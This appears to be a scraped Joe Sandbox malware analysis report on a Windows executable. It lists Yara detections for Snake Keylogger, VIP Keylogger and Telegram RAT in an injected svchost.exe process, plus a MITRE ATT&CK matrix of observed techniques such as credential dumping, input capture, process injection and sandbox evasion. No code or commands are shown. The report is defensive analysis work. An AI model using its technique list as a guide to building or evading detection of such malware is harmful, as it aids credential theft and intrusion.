Source: Yara match	File source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00856596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00856596
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00856A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00856A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8JVG9KELay.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
8JVG9KELay.exe